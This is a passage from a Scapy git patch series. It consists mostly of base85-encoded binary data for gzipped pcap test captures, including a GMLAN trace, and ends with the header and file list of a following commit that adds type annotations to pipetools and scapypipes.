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 N|3C9Mjf`lZ000{wkE{Ry diff --git a/test/pcaps/gmlan_trace.pcap.gz b/test/pcaps/gmlan_trace.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..cacfee19f7853838ed1ab66007e1f40e365ce533 GIT binary patch literal 8172 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 Date: Wed, 17 Nov 2021 14:06:58 +0100 Subject: [PATCH 0688/1632] [Hinty] Core typing: scapy/pipetools.py & scapy/scapypipes.py (#3429) * Type pipetool & undo cleanup convert_to * Type forgotten file --- .config/mypy/mypy_enabled.txt | 5 +- scapy/automaton.py | 3 +- scapy/config.py | 2 + scapy/packet.py | 68 ------- 